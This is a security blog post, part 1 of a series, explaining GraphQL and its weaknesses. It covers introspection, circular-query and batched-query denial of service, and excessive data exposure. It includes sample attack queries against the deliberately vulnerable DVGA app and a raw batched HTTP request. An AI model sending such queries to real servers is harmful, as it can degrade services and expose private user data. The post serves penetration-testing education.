The Security Puzzle of GraphQL - 1

By Shriyans Sudhi on 2th Jul, 2024

The Security Puzzle of GraphQL - 1

Okay, so I don't have anything against GraphQL, but the reason for saying this is that GraphQL is complex, and complexity is the worst enemy of security

Meme related to GraphQL

Image generation software credits: imgflip.com

What is GraphQL?

GraphQL is a query language for APIs and a runtime for executing those queries. It was developed by Facebook in 2012 and released as an open-source project in 2015. GraphQL allows clients to request exactly the data they need from a server, rather than fetching fixed responses. This helps reduce the amount of data transferred over the network and enables more efficient data retrieval.

Why use GraphQL over REST API?

GraphQL allows you to specify what data will be returned by the API. This feature is helpful when the client is required to receive a large amount of data and to retrieve different types of data, they have to make multiple REST API calls. Also, in the case of REST API, a lot of data isn’t consumed by the client. Hence, it becomes possible to control what data is to be returned by the server to the client.

Let's take a look at an example

Examples are essential to comprehensively understand technical concepts. Consider the following scenario: You are employed by a medical company and are tasked with calculating the average age of individuals diagnosed with diabetes. Although the purpose of this calculation may not be immediately apparent, let us proceed with this example for illustrative purposes.

To accomplish this, you will need to retrieve the ages of these individuals from a server. In the context of a REST API, this would involve making a request to a specific endpoint, such as /records/diabetes. This endpoint would return data in the following format:

{
    "diabetes": [{
            "name": "John Doe",
            "age": 45,
            "diabetic_since": "2021"
        },
        {
            "name": "Carlos",
            "age": 53,
            "diabetic_since": "2019"
        },
        .....
    ]
}

In this response, the name and diabetic_since parameters are not required for calculating the average age of the individuals. If GraphQL were employed instead, the response would be as follows:

{
    "data": {
        "Diabetes": [{
                "age": 45
            },
            {
                "age": 53
            },
            .......
        ]
    }
}

Now, since only the age parameter was required, the server returned solely the age information, omitting any extraneous parameters.

What does a query look like?

Before we dive any further, we should discuss what a GraphQL query looks like. We will take the example of the response shown above. In the first JSON (in which we used REST), it returned all data, but in the second one, it returned less data, as we wanted that much data only. So following is the query that can be used for that:-

query Diabetes {
	disbetes {
		age
	}
}

So here, you can see that the word diabetes is written two times, and if you’ll in the response, it starts with D and not d (note the upper/lower case here). That is defined by Diabetes, the one written in the first line. This can be defined by the user as per their choice. If you want to get a response with the term coffee, you can do this.

query Coffee {
	diabetes {
		age
	}
}

network chuck coffee

Image generation software credits: imgflip.com

Indeed, it is important to note that the REST API response also included the name and diabetic_since parameters. These additional parameters can be specified in the request if needed.

query Diabetes {
	diabetes {
		name
		age
		diabetic_since
	}
}

Indeed, if you specify the additional parameters in your request, the server will include them in the response as well. This capability allows for more tailored data retrieval based on specific requirements.

Okay, but what's the vulnerability here?

When discussing GraphQL, the focus isn't on GraphQL itself being a vulnerability, but rather on other potential vulnerabilities that require attention. In this blog, we will address these issues systematically:

  1. Introspection enabled: This feature can provide valuable insights for hackers or penetration testers.
  2. Denial of Service (DoS): Techniques that can overwhelm a system's resources.
  3. Circular Queries: Queries that unintentionally create infinite loops.
  4. Query Batching DoS: Exploiting query batching for brute force attacks.
  5. Alias Overloading: Techniques abusing aliasing for malicious purposes.
  6. Excessive Data Exposure: Unnecessarily exposing sensitive information.
  7. Access Controls: Ensuring proper access restrictions are in place.
  8. Query-Cost Analysis: A method to detect and mitigate DoS attacks specific to GraphQL.

These topics will guide our exploration into securing applications using GraphQL effectively.

GraphQL introspection enabled

Imagine asking someone what they know about themselves, and them replying with all of their things. Suppose you ask a person this question. They replied with: “I know about my name, age, date of birth, place of birth, SSN, passport details, bank info which includes account number, bank in which account is there, bank balance, and bank password, my home address, my work address, my social accounts info of Google, Meta (aka good old Facebook), X (miss you Twitter), Reddit, and Mastodon which include their account usernames/emails and their passwords, ……….”

I ain't that dumb though

Image generation software credits: imgflip.com

It's indeed surprising, but such instances do exist—GraphQL servers with introspection enabled. In GraphQL, there's a feature that facilitates understanding the parameters accepted by a GraphQL instance, known as the "mutation query." Here's an example showcasing introspection on DVGA:

GraphQL introspection enabled

It's indeed surprising, but such instances do exist—GraphQL servers with introspection enabled. In GraphQL, there's a feature that facilitates understanding the parameters accepted by a GraphQL instance, known as the "mutation query." Here's an example showcasing introspection on DVGA

Introspection through Postman

Or, if you use Burp Suite, it also has a built-in feature to load introspection query for GraphQL servers

Introspection through Burp Suite

And last but not least, if you are a Caido enthusiast (like myself), you can utilize a workflow specifically designed for this purpose. It can be found at Caido Introspection Query Workflow. This tool is excellent for detecting whether introspection is enabled. Subsequently, you can employ other API clients like Postman for further analysis.

Postman is highly effective for GraphQL exploration and works seamlessly out of the box. Additionally, there are other tools tailored specifically for GraphQL, such as the Altair GraphQL client. However, I find that Postman is the most efficient tool for API testing.

Denial of Service

Circular Queries

Ever learned of this:-

while True:
	print("Hack the Planet!")

Well, if yes, imagine this:-

You are asked to purchase ‘X’ from store ‘A’. The person at store ‘A’ tells you that ‘X’ is available at store ‘B’, so you go to store ‘B’. Now, the person at store ‘B’ tells you that ‘X’ is available at ‘A’. Imagine this cycle goes on for a long, and lastly, after a long time, you get ‘X’ from either store.

Go to 'A' then 'B' then 'A' then continue

Image generation software credits: imgflip.com

In non-technical terms, a circular query in GraphQL can be understood as follows: GraphQL allows you to define queries specifying the exact resources you wish to retrieve.

In this context, imagine that a field in the first object of the schema references a second object, and a field in the second object references the first object. This creates a circular relationship between the two objects.

Reading and understanding such relationships from a text file can be cumbersome and error-prone. However, if we can visualize the data, identifying and understanding circular queries becomes much easier. The following is visualized using GraphQL Voyager

GraphQL Schema loaded in GraphQL

The above image illustrates the GraphQL schema for DVGA (Damn Vulnerable GraphQL Application). In this visualization, you can observe that under PasteObject, there is an arrow pointing to OwnerObject, and from OwnerObject, two arrows point back to PasteObject. This circular relationship can be exploited to craft a query that causes the server to enter an infinite loop.

To create such a query, we need to identify queries that reference either PasteObject or OwnerObject. These queries are pastes, paste, and readAndBurn. Additionally, we can take an indirect approach by using the search query, which points to SearchResult, and subsequently leads to PasteObject.

query Pastes {
    pastes {
        owner {
            pastes {
                owner {
                    pastes {
                        owner {
                            pastes {
                                owner {
                                    pastes {
                                        owner {
                                            pastes {
                                                owner {
                                                    pastes {
                                                        id
                                                    }
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}
query Search {
    search {
        ...on PasteObject {
            owner {
                pastes {
                    owner {
                        pastes {
                            owner {
                                pastes {
                                    owner {
                                        pastes {
                                            owner {
                                                pastes {
                                                    owner {
                                                        pastes {
                                                            owner {
                                                                id
                                                            }
                                                        }
                                                    }
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

If we issue this request to the server, you will notice a significant delay compared to other responses. If your DVGA installation is fresh, with the default (i.e., minimal) data, or if your computer has substantial resources, the response may still be relatively quick. However, in real-world scenarios, servers often handle vast amounts of data, and their computing resources may be limited, leading to more pronounced delays.

Query Batching DoS

Query batching is a feature in GraphQL that allows you to send multiple queries within a single request. An example of a simple GraphQL query is as follows:

POST /graphql HTTP/1.1
accept: application/json
content-type: application/json
user-agent: PostmanClient/11.1.25 (AppId=21e0a631-e472-46fa-bbc4-5e04e34bf593)
Host: <host>:5013
Content-Length: 521
Connection: close

{"query": "query Introspection { __schema { types { name } } }"}

And, a batched query looks like this:-

POST /graphql HTTP/1.1
accept: application/json
content-type: application/json
user-agent: PostmanClient/11.1.25 (AppId=21e0a631-e472-46fa-bbc4-5e04e34bf593)
Host: <host>:5013
Content-Length: 521
Connection: close

[{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"},{"query": "query Introspection { __schema { types { name } } }"}]

In a typical GraphQL query, the data is sent as a single object at the root level. However, with a batched query, an array of objects is sent instead. The potential issue arises when an attacker sends 500 or more queries in a single request. Processing such a large number of queries simultaneously can consume a significant amount of server resources, leading to potential performance degradation or denial of service.

Alias Overloading

This issue is quite similar to the previous one. Suppose you need to make a single query multiple times for different users, such as retrieving data for user IDs 1, 2, 3, 4, and 5. If the server returns the same key for all these queries, it would be challenging to distinguish which data belongs to which user. Requiring multiple requests for this purpose contradicts the fundamental principle of GraphQL, which is to retrieve only the necessary data in a single request.

This problem can be addressed using aliases. Aliases allow you to assign custom names to the data returned for a particular query, making it easier to identify the results. Here is an example demonstrating the use of aliases:

query Users {
  user1: user(id: "1") {
    name
    age
  }
  user2: user(id: "2") {
    name
    age
  }
  user3: user(id: "3") {
    name
    age
  }
  user4: user(id: "4") {
    name
    age
  }
  user5: user(id: "5") {
    name
    age
  }
}

In this example, each user query is assigned a unique alias (e.g., user1, user2), ensuring that the data for each user is clearly identifiable in the response.

Excessive Data Exposure

Excessive Data Exposure is classified as API3:2023 Broken Object Property Level Authorization (BOPLA). BOPLA is a combination of excessive data exposure and mass assignment. In this context, we will focus on excessive data exposure, which occurs when an API returns more data in the response than what is displayed in the user interface or required by the application.

Consider a scenario where you visit a forum hosted on a company's subdomain, with accounts linked directly to the company's main application. Companies often collect extensive information, such as emails, phone numbers, names, addresses, Social Security numbers, credit card information, etc. Most of this information is meant to be kept private, with only specific details like names and, in some cases, emails being publicly accessible, depending on the company's business nature.

When accessing the forum, you should only see the name and username of other users. If the API response reveals additional private information, such as email addresses (which are not displayed in the UI), it constitutes excessive data exposure.

In a REST API, when you request information about a resource, the API returns all the information it has. If it is vulnerable to excessive data exposure, it will simply provide all the information available. In GraphQL, however, you need to specify which resources you want to retrieve.

To exploit this vulnerability in forum software, an attacker would need to specify sensitive parameters such as email, address, credit_card, etc., in the query.

Here’s an example of a query made to retrieve a user's post on a forum:

query Post {
    post(id: 1) {
        id
        title
        content
        owner {
            name
        }
    }
}

Now, if we wanted to get the email address and IP address of the machine from which the post was created, we could use the given query:-

query Post {
    post(id: 1) {
        id
        title
        content
        ip_address
        owner {
            name
            email
        }
    }
}

In this, we could’ve got the IP address and the email of the user who created the post, though it was unintended by the developers of the app.


I hope that you enjoyed this article. We will soon bring the next part of this article, which is a case study, in which we will discuss how we were able to find critical vulnerabilities in one our client's GraphQL instance using the techniques mentioned in this article.

See you next time

Peace ✌️

Subscribe to our newsletter !